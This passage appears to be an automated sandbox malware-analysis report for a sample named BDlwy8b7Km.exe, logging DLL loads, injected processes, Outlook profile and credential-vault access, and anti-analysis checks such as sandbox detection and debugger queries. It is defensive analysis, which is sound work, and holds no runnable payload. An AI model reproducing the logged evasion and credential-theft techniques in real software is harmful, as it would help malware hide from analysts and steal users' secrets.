                Source: C:\Windows\SysWOW64\relog.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: pdh.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\relog.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\relog.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\relog.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: BDlwy8b7Km.exe Static file information: File size 1334784 > 1048576
                Source: BDlwy8b7Km.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: BDlwy8b7Km.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: BDlwy8b7Km.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: BDlwy8b7Km.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: BDlwy8b7Km.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: BDlwy8b7Km.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: BDlwy8b7Km.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: relog.pdbGCTL source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: relog.pdb source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559491409.000000000068E000.00000002.00000001.01000000.00000005.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3558984084.000000000068E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
                Source: BDlwy8b7Km.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: BDlwy8b7Km.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: BDlwy8b7Km.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: BDlwy8b7Km.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: BDlwy8b7Km.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_005942DE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005B0A76 push ecx; ret 0_2_005B0A89
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403280 push eax; ret 1_2_00403282
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414323 push cs; retf 1_2_0041436D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417BE2 push edi; iretd 1_2_00417BEC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417C30 push esi; ret 1_2_00417C32
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D5CD push es; ret 1_2_0040D5D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417DF9 push FFFFFF83h; retf 1_2_00417E04
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401753 push edi; retf 1_2_00401754
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036027FA pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx 1_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360283D push eax; iretd 1_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360135F push eax; iretd 1_2_03601369
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B6D19E push FFFFFF83h; retf 5_2_03B6D1A9
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B6CF87 push edi; iretd 5_2_03B6CF91
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B6CFD5 push esi; ret 5_2_03B6CFD7
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B674E2 push cs; retf 5_2_03B674E3
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036309AD push ecx; mov dword ptr [esp], ecx 6_2_036309B6
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EF0267 push esp; ret 6_2_02EF026A
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EE4B76 push FFFFFF83h; retf 6_2_02EE4B81
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EE49AD push esi; ret 6_2_02EE49AF
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EE495F push edi; iretd 6_2_02EE4969
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EDDEE9 push ecx; retf 6_2_02EDDEF6
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350511D push 00000036h; iretd 6_2_03505127
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350577A push es; iretd 6_2_03505802
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03505701 push esp; ret 6_2_03505702
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_035057F4 push es; iretd 6_2_03505802
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03509F7E pushfd ; retf 6_2_03509F87
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350EF1D push ds; ret 6_2_0350EF1F
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350BFF6 push ss; ret 6_2_0350C00B
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03505FB6 push cs; retf 6_2_03505FB7
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_005AF98E
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_00621C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00621C41
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\relog.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\relog.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\relog.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\relog.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\relog.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-97216
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe API/Special instruction interceptor: Address: 165CC14
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe API coverage: 3.8 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\relog.exe API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\relog.exe TID: 7724 Thread sleep count: 40 > 30
                Source: C:\Windows\SysWOW64\relog.exe TID: 7724 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe TID: 7748 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\relog.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\relog.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_005FDBBE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_006068EE FindFirstFileW,FindClose, 0_2_006068EE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0060698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0060698F
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_005FD076
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_005FD3A9
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_00609642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00609642
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0060979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0060979D
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_00609B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00609B2B
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_00605C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00605C97
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EEC330 FindFirstFileW,FindNextFileW,FindClose, 6_2_02EEC330
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_005942DE
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3559905244.0000000000C9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss0
                Source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2345684003.0000021D37C8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\relog.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417523 LdrLoadDll, 1_2_00417523
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0060EAA2 BlockInput, 0_2_0060EAA2
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005C2622
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_005942DE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005B4CE8 mov eax, dword ptr fs:[00000030h] 0_2_005B4CE8
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0165CEE0 mov eax, dword ptr fs:[00000030h] 0_2_0165CEE0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0165CE80 mov eax, dword ptr fs:[00000030h] 0_2_0165CE80
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0165B860 mov eax, dword ptr fs:[00000030h] 0_2_0165B860
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D437C mov eax, dword ptr fs:[00000030h] 1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h] 1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h] 1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h] 1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h] 1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0370634F mov eax, dword ptr fs:[00000030h] 1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03708324 mov eax, dword ptr fs:[00000030h] 1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h] 1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03708324 mov eax, dword ptr fs:[00000030h] 1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03708324 mov eax, dword ptr fs:[00000030h] 1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h] 1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h] 1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h] 1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h] 1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h] 1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h] 1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036663FF mov eax, dword ptr fs:[00000030h] 1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h] 1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h] 1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h] 1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h] 1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h] 1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h] 1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h] 1_2_036DE3DB
